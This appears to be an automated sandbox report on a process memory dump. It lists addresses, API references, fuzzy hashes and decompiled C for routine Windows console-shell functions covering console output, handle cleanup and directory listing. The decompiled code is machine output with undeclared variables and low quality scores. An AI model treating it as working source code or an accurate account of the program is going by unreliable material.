0x0034bf5c
0x0034bf62
0x0034bf68
0x0034bf6d
0x0034bf70
0x00000000
0x00000000
0x00000000
0x0034bf70
0x0033e75b
0x0033e75f
0x0033e765
0x00000000
0x0033e84e
0x0033e856
0x0033e85b
0x0033e85d
0x00000000
0x00000000
0x0033e866
0x0033e869
0x0033e86e
0x0033e870
0x00000000
0x00000000
0x0033e876
0x0033e87d
0x0033e87f
0x0033e8ad
0x0033e8ad
0x0033e88a
0x0033e88f
0x0033e892
0x00000000
0x0033e898
0x0034bf01
0x0034bf05
0x0034bf1a
0x0034bf1a
0x0034bf21
0x0034bf23
0x0034bf25
0x0034bf25
0x0034bf29
0x0034bf2d
0x0034bf2e
0x0034bf31
0x0034bf36
0x0034bf38
0x00000000
0x0034bf3a
0x0034bf3a
0x0034bf3c
0x0034bf44
0x00000000
0x0034bf44
0x0034bf07
0x0034bf0b
0x0034bf0d
0x0034bf12
0x0034bf14
0x0034bfa2
0x0034bfa9
0x0034bfaf
0x0034bfb2
0x00000000
0x0034bfb2
0x00000000
0x0034bf14
0x0034bf05
0x0033e892
0x0033e704
0x0033e83d
0x0033e83d
0x0033e83d
0x0033e77b
0x0033e781
0x0034c011
0x0034c011
0x00000000
0x0033e787
0x0033e787
0x0033e78b
0x0033e5b0
0x0033e5b7
0x0034be97
0x0034be9c
0x0034be9c
0x0033e5c4
0x0033e5cb
0x00000000
0x00000000
0x00000000
0x00000000
0x0033e5cb
0x0033e781
0x0033e5d5
0x0033e5dc
0x0033e5e1
0x00000000
0x00000000
0x0033e5f1
0x0033e5f7
0x0033e5f9
0x0033e5ff
0x0033e602
0x0033e605
0x0033e608
0x0033e60a
0x0033e60f
0x0033e62b
0x0033e62c
0x0033e632
0x0033e637
0x00000000
0x00000000
0x0033e640
0x0034bfcf
0x0034bfd4
0x0034bfdb
0x0034bfdd
0x0034bfe4
0x0034bfe6
0x0034bff7
0x0034bffc
0x0034bffc
0x0034bfe4
0x0034bfff
0x0034c00b
0x00000000
0x0033e656
0x0033e659
0x0033e794
0x00000000
0x0033e65f
0x0033e65f
0x0033e663
0x00000000
0x0033e663
0x0033e659
0x0033e640
0x0033e614
0x0034bea5
0x0034beab
0x0034beab
0x0034beac
0x0034beae
0x0034beae
0x0034beb1
0x0034beb1
0x0034beb1
0x0034beb6
0x0033e621
0x00000000

APIs

_tell.MSVCRT ref: 0033E5F9
_close.MSVCRT ref: 0033E62C
memset.MSVCRT ref: 0033E6CC
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0033E736
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00363840), ref: 0033E747
??_V@YAXPAX@Z.MSVCRT ref: 0033E772

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleInfoOutput_close_tellmemset
String ID:
API String ID: 1380661413-0
Opcode ID: ed0bf73556587dcb3aeee7d463bbb14e6cf8f47491cc5b8287ead5abea28540f
Instruction ID: fe16cb628be574815a5de525d35bfdce3ec3f6b32176dd6df4b86fd1cd3cd47f
Opcode Fuzzy Hash: ed0bf73556587dcb3aeee7d463bbb14e6cf8f47491cc5b8287ead5abea28540f
Instruction Fuzzy Hash: 0441D670A04301CBD7379F14D88871AB7E5AF85714F16092DE8599F2E1EB34EC99CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00342616, Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00342616(long __ecx, DWORD* __edx) {
				void _v8;
				void* _t4;
				long _t5;
				int _t21;
				long _t43;

				_push(__ecx);
				_t40 = __edx;
				_t43 = 0;
				if(__edx <= 0) {
					L5:
					_t5 = _t43;
					L6:
					return _t5;
				}
				if(E0034269C(_t4) != 0) {
					__imp__AcquireSRWLockShared(0x377f20);
					_t7 =  &_v8;
					__imp___get_osfhandle(0);
					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
					if(_t21 == 0) {
						_t43 = GetLastError();
					}
					__imp__ReleaseSRWLockShared(0x377f20);
				} else {
					_t40 = __edx + __edx;
					_t21 = E003427C8( &_v8, __ecx, _t40,  &_v8);
				}
				if(_t21 == 0 || _v8 != _t40) {
					_t43 = GetLastError();
					if(_t43 == 0) {
						_t43 = 0x70;
					}
					if(E00340178(_t10) == 0) {
						if(E00359953(_t11, 1) == 0) {
							E0035985A(_t43);
						} else {
							_push(0);
							_push(0x2364);
							E0033C5A2(1);
						}
						_t5 = 1;
						goto L6;
					} else {
						_push(0);
						_push(0x1d);
						E0033C5A2(1);
						goto L5;
					}
				} else {
					goto L5;
				}
			}

0x0034261b
0x0034261f
0x00342621
0x00342627
0x00342659
0x00342659
0x0034265b
0x00342661
0x00342661
0x00342633
0x00342667
0x0034266f
0x00342677
0x00342685
0x00342689
0x0034d681
0x0034d681
0x00342694
0x00342635
0x00342638
0x00342646
0x00342646
0x0034264a
0x0034d68e
0x0034d692
0x0034d696
0x0034d696
0x0034d6a3
0x0034d6be
0x0034d6d2
0x0034d6c0
0x0034d6c0
0x0034d6c2
0x0034d6c7
0x0034d6cd
0x0034d6d7
0x00000000
0x0034d6a5
0x0034d6a5
0x0034d6a7
0x0034d6a9
0x00000000
0x0034d6af
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0034269C: _get_osfhandle.MSVCRT ref: 003426A7
Part of subcall function 0034269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0033C5F8,?,?,?), ref: 003426B6
Part of subcall function 0034269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426D2
Part of subcall function 0034269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000002), ref: 003426E1
Part of subcall function 0034269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003426EC
Part of subcall function 0034269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426F5

AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000000,?,?,0036B980,00000002,00000000,?,00349CA6,%s %s ,?,00000000,00000000), ref: 00342667
_get_osfhandle.MSVCRT ref: 00342677
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00349CA6,%s %s ,?,00000000,00000000), ref: 0034267F
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00342694

Part of subcall function 003427C8: _get_osfhandle.MSVCRT ref: 003427DB
Part of subcall function 003427C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0036B980,000000FF,0035D620,00002000,00000000,00000000), ref: 0034281C
Part of subcall function 003427C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0035D620,-00000001,?,00000000), ref: 00342831

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
String ID:
API String ID: 4057327938-0
Opcode ID: b9376a5b3b9738af312410e70f3ce9803e720f23c9045be985820763d314cd9d
Instruction ID: 1304b6376a39a4b0b2695244d8ef022106e28e509cc5f034e85b9e8b6c940661
Opcode Fuzzy Hash: b9376a5b3b9738af312410e70f3ce9803e720f23c9045be985820763d314cd9d
Instruction Fuzzy Hash: F4210832740305ABE7376AA66C86B6B36DCCB81751F53013EFA0EEE181DDA8FC004664

Uniqueness

Uniqueness Score: -1.00%

Function 003427C8, Relevance: 9.1, APIs: 6, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E003427C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
				void* _v8;
				long _v12;
				long _v16;
				long _t15;
				void* _t17;
				void* _t24;
				DWORD* _t29;
				long _t31;
				long _t32;

				_t31 = _a4;
				_t23 = __edx;
				_v16 = _t31;
				__imp___get_osfhandle(_t24);
				_v8 = __eax;
				if( *0x37805c != 0) {
					return WriteFile(__eax, __edx, _t31, _a8, 0);
				}
				_t29 = _a8;
				while(_t31 > 0x2000) {
					_t15 = WideCharToMultiByte( *0x363854, 0, _t23, 0x1000, 0x35d620, 0x2000, 0, 0);
					_v12 = _t15;
					_t23 =  &(_t23[0x1000]);
					_t31 = _t31 - 0x2000;
					if(WriteFile(_v8, 0x35d620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
						L9:
						_t17 = 0;
						L7:
						return _t17;
					} else {
						continue;
					}
				}
				if(_t31 == 0) {
					L6:
					 *_t29 = _v16;
					_t17 = 1;
					goto L7;
				}
				_t5 = WideCharToMultiByte( *0x363854, 0, _t23, 0xffffffff, 0x35d620, 0x2000, 0, 0) - 1; // -1
				_t32 = _t5;
				if(WriteFile(_v8, 0x35d620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
					goto L9;
				} else {
					goto L6;
				}
			}

0x003427d2
0x003427d5
0x003427d8
0x003427db
0x003427e9
0x003427ec
0x00000000
0x0034d70d
0x003427f3
0x003427f6
0x0034d730
0x0034d747
0x0034d74a
0x0034d74c
0x0034d756
0x00342850
0x00342850
0x00342847
0x00000000
0x0034d767
0x00000000
0x0034d767
0x0034d756
0x00342805
0x0034283f
0x00342842
0x00342846
0x00000000
0x00342846
0x00342825
0x00342825
0x00342839
0x00000000
0x00000000
0x00000000
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 003427DB
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0036B980,000000FF,0035D620,00002000,00000000,00000000), ref: 0034281C
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0035D620,-00000001,?,00000000), ref: 00342831
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0036B980,?,?,00000000), ref: 0034D70D
WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0036B980,00001000,0035D620,00002000,00000000,00000000,00000000), ref: 0034D730
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0035D620,00000000,?,00000000), ref: 0034D74E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
String ID:
API String ID: 3249344982-0
Opcode ID: 5aaab74ba8fbafa6e7b8be5e23af9371f3d51e01e1f364acca335ecc7eb2e78b
Instruction ID: c2ab2b2ca4a33a707bd705e5ab7ada6c0ef5748e4261d0087c61a0a0466638c3
Opcode Fuzzy Hash: 5aaab74ba8fbafa6e7b8be5e23af9371f3d51e01e1f364acca335ecc7eb2e78b
Instruction Fuzzy Hash: 65219D71A44204BBEB324F609C09FAEBBFCEB48751F604125F909BB1E0D6B06D84CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0035265F, Relevance: 9.1, APIs: 6, Instructions: 82
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0035265F(int* __ecx) {
				void** _v0;
				void* _v8;
				int _t18;
				void** _t29;
				void** _t32;
				void* _t39;
				void* _t42;

				_push(__ecx);
				_t39 = __ecx;
				_t2 = _t39 + 4; // 0x4
				_t29 = _t2;
				_t32 = _t29;
				E00352D6D(_t32,  &_v8);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t42 = _v8;
					goto L18;
				} else {
					_t33 = __ecx[2];
					if(__ecx[2] != 0) {
						E00352DB4(_t33);
					}
					_t42 = 0;
					 *(_t39 + 8) = 0;
					_t34 =  *(_t39 + 0xc);
					if( *(_t39 + 0xc) != 0) {
						E00352DB4(_t34);
					}
					_t35 = _v8;
					 *(_t39 + 0xc) = _t42;
					if(_v8 != 0) {
						E00352DE9(_t35);
					}
					_t18 = E003525D6(_t35);
					if(_t18 == 0) {
						_t8 = _t39 + 0x18; // 0x18
						_t32 = _t8;
						E0035170A(_t32);
						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
							L10:
							_push(_t32);
							L11:
							_t32 = _v0;
							E00352D56();
						}
						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
							goto L10;
						}
						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
							goto L10;
						}
						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
						L18:
						if(_t42 != 0) {
							_t18 = ReleaseMutex(_t42);
							if(_t18 == 0) {
								_push(_t32);
								goto L11;
							}
						}
					}
				}
				return _t18;
			}

0x00352664
0x00352668
0x00352670
0x00352670
0x00352674
0x00352676
0x0035267d
0x00352680
0x00352682
0x00352718
0x00000000
0x00352688
0x00352688
0x0035268d
0x0035268f
0x0035268f
0x00352694
0x00352696
0x00352699
0x0035269e
0x003526a0
0x003526a0
0x003526a5
0x003526a8
0x003526ad
0x003526af
0x003526af
0x003526b4
0x003526bb
0x003526bd
0x003526bd
0x003526c0
0x003526c8
0x003526d7
0x003526d7
0x003526dd
0x003526dd
0x003526e0
0x003526e0
0x003526e8
0x00000000
0x00000000
0x003526f9
0x00000000
0x00000000
0x00352710
0x0035271b
0x0035271d
0x00352720
0x00352728
0x0035272a
0x00000000
0x0035272b
0x00352728
0x0035271d
0x003526bb
0x00352738

APIs

Part of subcall function 00352D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,00351838,?), ref: 00352D7C

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 003526CD

Part of subcall function 00352DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,003526A5,?), ref: 00352DBD
Part of subcall function 00352DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,003526A5,?), ref: 00352DC6
Part of subcall function 00352DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,003526A5,?), ref: 00352DDF

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 003526ED
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 003526FD
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 00352709
RtlFreeHeap.NTDLL(00000000), ref: 00352710
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 00352720

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
String ID:
API String ID: 2383944720-0
Opcode ID: 10aae8ac47bbe7a98dda576423f999af82ed8a6fd77815be4f6b565aa0728ab1
Instruction ID: f901a871f58db1c3bde14f9fc5a35fee097f95af18225aefbd885ec19df78f22
Opcode Fuzzy Hash: 10aae8ac47bbe7a98dda576423f999af82ed8a6fd77815be4f6b565aa0728ab1
Instruction Fuzzy Hash: 56219230201116ABCB27EF66D848E6BB778FF56702B118229FC199A521DB70DC58CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00356E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

_wcsicmp.MSVCRT ref: 00356EFC
_wcsicmp.MSVCRT ref: 00356F1B
_wcsicmp.MSVCRT ref: 00356F41

Strings

KEYS, xrefs: 00356F2F
OFF, xrefs: 00356F14, 00356F19
LIST, xrefs: 00356F3B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmpwcschr$iswspace
String ID: KEYS$LIST$OFF
API String ID: 3924973218-4129271751
Opcode ID: 4cf5c2ba9b47f9eaa65c537e05f0548a6c1d1504f88eb23dedbae6ad521d49bd
Instruction ID: 8ccf1fdee35846c38052b5fca181b6ecf0c762e59f31520737fbeaadfac3a2ec
Opcode Fuzzy Hash: 4cf5c2ba9b47f9eaa65c537e05f0548a6c1d1504f88eb23dedbae6ad521d49bd
Instruction Fuzzy Hash: 0F116A356082019AB3176726EC97C33B3ACEB95771BA1801EF80B4B1D1DE615D498A20

Uniqueness

Uniqueness Score: -1.00%

Function 00346CE1, Relevance: 9.1, APIs: 6, Instructions: 79
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00346CE1(void* __eax) {
				void** _v0;
				void* _v8;
				int _t19;
				void** _t30;
				void* _t32;
				void** _t33;
				void* _t40;
				void* _t43;

				_t32 =  *0x35d010; // 0x0
				if(_t32 != 0) {
					_push(_t32);
					_t40 = _t32;
					_t2 = _t40 + 4; // 0x4
					_t30 = _t2;
					_t33 = _t30;
					E00352D6D(_t33,  &_v8);
					_t19 =  *_t40 - 1;
					 *_t40 = _t19;
					if(_t19 != 0) {
						_t43 = _v8;
						goto L20;
					} else {
						_t34 =  *(_t40 + 8);
						if( *(_t40 + 8) != 0) {
							E00352DB4(_t34);
						}
						_t43 = 0;
						 *(_t40 + 8) = 0;
						_t35 =  *(_t40 + 0xc);
						if( *(_t40 + 0xc) != 0) {
							E00352DB4(_t35);
						}
						_t36 = _v8;
						 *(_t40 + 0xc) = _t43;
						if(_v8 != 0) {
							E00352DE9(_t36);
						}
						_t19 = E003525D6(_t36);
						if(_t19 == 0) {
							_t8 = _t40 + 0x18; // 0x18
							_t33 = _t8;
							E0035170A(_t33);
							if( *(_t40 + 0xc) != _t43 && CloseHandle( *(_t40 + 0xc)) == 0) {
								L12:
								_push(_t33);
								L13:
								_t33 = _v0;
								E00352D56();
							}
							if( *(_t40 + 8) != _t43 && CloseHandle( *(_t40 + 8)) == 0) {
								goto L12;
							}
							if( *_t30 != _t43 && CloseHandle( *_t30) == 0) {
								goto L12;
							}
							_t19 = RtlFreeHeap(GetProcessHeap(), _t43, _t40);
							L20:
							if(_t43 != 0) {
								_t19 = ReleaseMutex(_t43);
								if(_t19 == 0) {
									_push(_t33);
									goto L13;
								}
							}
						}
					}
					return _t19;
				} else {
					return __eax;
				}
			}

0x00346ce1
0x00346ce9
0x00352664
0x00352668
0x00352670
0x00352670
0x00352674
0x00352676
0x0035267d
0x00352680
0x00352682
0x00352718
0x00000000
0x00352688
0x00352688
0x0035268d
0x0035268f
0x0035268f
0x00352694
0x00352696
0x00352699
0x0035269e
0x003526a0
0x003526a0
0x003526a5
0x003526a8
0x003526ad
0x003526af
0x003526af
0x003526b4
0x003526bb
0x003526bd
0x003526bd
0x003526c0
0x003526c8
0x003526d7
0x003526d7
0x003526dd
0x003526dd
0x003526e0
0x003526e0
0x003526e8
0x00000000
0x00000000
0x003526f9
0x00000000
0x00000000
0x00352710
0x0035271b
0x0035271d
0x00352720
0x00352728
0x0035272a
0x00000000
0x0035272b
0x00352728
0x0035271d
0x003526bb
0x00352738
0x00346cef
0x00346cef
0x00346cef

APIs

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 003526CD
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 003526ED
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 003526FD
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 00352709
RtlFreeHeap.NTDLL(00000000), ref: 00352710
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 00352720

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$Heap$FreeMutexProcessRelease
String ID:
API String ID: 1689195821-0
Opcode ID: ef1cc7680367268e0d849613a6604333fad8b080d2d130fa1e61a71ac509a043
Instruction ID: 5b5ad55fb18931d653415f3c49521a2c7269d1f214ab3173b36a42150402bfd3
Opcode Fuzzy Hash: ef1cc7680367268e0d849613a6604333fad8b080d2d130fa1e61a71ac509a043
Instruction Fuzzy Hash: 0A21A130201102ABCB2BEF61D858E6BB778BF56702B018229FC1586531DB70DC58CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00340178, Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00340183
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0034D6A1), ref: 0034018D
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 003401B8
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000001), ref: 003401C7
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003401D2
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 003401DB

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: 3b8b49402dad6a0deeaa2ec19b4653e7fbe2ed0a827e90c5029c4d743e21db36
Instruction ID: a452494cbf1ffe0b23c781d953b4c264a3d3376e78b5221cda0afed13918aea5
Opcode Fuzzy Hash: 3b8b49402dad6a0deeaa2ec19b4653e7fbe2ed0a827e90c5029c4d743e21db36
Instruction Fuzzy Hash: AA113637914250ABE7374778DD4DB7B36ECE745321F250326EE2AA64E0C7346D80D651

Uniqueness

Uniqueness Score: -1.00%

Function 0034269C, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 003426A7
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0033C5F8,?,?,?), ref: 003426B6
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426D2
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000002), ref: 003426E1
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003426EC
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426F5

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
String ID:
API String ID: 513048808-0
Opcode ID: b39ac36b1bedb720450b9f04dc135a3d6af238b090d614a568357db099d6c30c
Instruction ID: 67dc89f86d73123760fd0a378a6c712d08fda920f132c986af4300c62fa00ca2
Opcode Fuzzy Hash: b39ac36b1bedb720450b9f04dc135a3d6af238b090d614a568357db099d6c30c
Instruction Fuzzy Hash: 6701DB338141256B9B3313789D8CA7F3BECD646331B660322FC29F65D1DD64EC854191

Uniqueness

Uniqueness Score: -1.00%

Function 00345266, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00345266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char** _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v124;
				unsigned int _t115;
				void* _t123;
				intOrPtr _t129;
				void* _t138;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr _t146;
				void* _t147;
				intOrPtr _t152;
				intOrPtr _t162;
				char _t163;
				char* _t164;
				void* _t168;
				void* _t172;
				char* _t180;
				char* _t181;
				void* _t182;
				signed int _t183;
				signed int _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				signed int _t218;
				void* _t220;
				void* _t222;
				void* _t224;
				void* _t225;
				intOrPtr _t227;
				intOrPtr _t231;

				_t195 = __edx;
				_v20 = __edx;
				_t168 = __ecx;
				_v28 = 0;
				_v16 = 0;
				_t227 =  *0x35d544; // 0x0
				if(_t227 != 0) {
					L47:
					return 1;
				}
				_t115 = _a12;
				_v8 = _t115;
				_t8 =  &_a24; // 0x343078
				_t208 = _t115 >> 0x00000002 & 1;
				_t123 = E00345590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20,  *_t8, _a28, _a32);
				if(_t123 == 0) {
					_v16 = 1;
					_t216 = _v8 & 0x00000001;
					L4:
					E00340040( *((intOrPtr*)(_t168 + 0x18)));
					 *((intOrPtr*)(_t168 + 0x18)) = 0;
					_t231 =  *0x35d544; // 0x0
					if(_t231 != 0) {
						goto L47;
					}
					if(_t216 == 0) {
						return 0;
					}
					memset( &_v76, 0, 0x30);
					_t225 = _t224 + 0xc;
					_t129 = E0034297B( *((intOrPtr*)(_t168 + 4)));
					_t172 = 0x10;
					_v72 = _t129;
					_t173 = E003400B0(_t172);
					if(_t173 == 0) {
						L51:
						E00359287(_t173);
						__imp__longjmp(0x36b8b8, 1);
						L52:
						_v56 = _t195;
						_t218 = _t195;
						L10:
						if( *0x35d544 != 0) {
							goto L47;
						}
						_v12 = _t195;
						if(_v56 <= 0) {
							L38:
							E00340040(_v48);
							E00340040(_v52);
							E00340040(_v64[1]);
							E00340040(_v64);
							E00340040(_v72);
							if(_t218 != 0 || _v16 != _t218) {
								return _t218;
							} else {
								_push(2);
								L41:
								_pop(_t138);
								return _t138;
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t180 = ".";
							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
							_t37 = _t210 + 0x30; // 0x30
							_t140 = _t37;
							_v24 = _t140;
							while(1) {
								_t196 =  *_t140;
								if(_t196 !=  *_t180) {
									break;
								}
								if(_t196 == 0) {
									L17:
									_t141 = 0;
									L18:
									if(_t141 == 0) {
										goto L37;
									}
									_t181 = L"..";
									_t41 = _t210 + 0x30; // 0x30
									_t144 = _t41;
									while(1) {
										_t197 =  *_t144;
										if(_t197 !=  *_t181) {
											break;
										}
										if(_t197 == 0) {
											L24:
											_t145 = 0;
											L25:
											if(_t145 == 0) {
												goto L37;
											}
											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
												L28:
												_t198 =  *((intOrPtr*)(_t168 + 4));
												_t51 = _t198 + 2; // 0x402
												_t182 = _t51;
												do {
													_t146 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t146 != 0);
												_t211 = _v24;
												_t183 = _t211;
												_t195 = _t198 - _t182 >> 1;
												_t220 = _t183 + 2;
												do {
													_t147 =  *_t183;
													_t183 = _t183 + 2;
												} while (_t147 != _v28);
												_t55 = _t195 + 2; // 0x400
												_t185 = _t183 - _t220 >> 1;
												_t222 = _t55 + (_t183 - _t220 >> 1);
												if(_t222 > 0x7fe7) {
													_push(_t211);
													E0033C5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
													_push(0x6f);
													goto L41;
												}
												memset( &_v124, 0, 0x30);
												_t225 = _t225 + 0xc;
												_t173 = _t222 + _t222;
												_t152 = E003400B0(_t222 + _t222);
												if(_t152 == 0) {
													goto L51;
												}
												_v120 = _t152;
												E003451C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
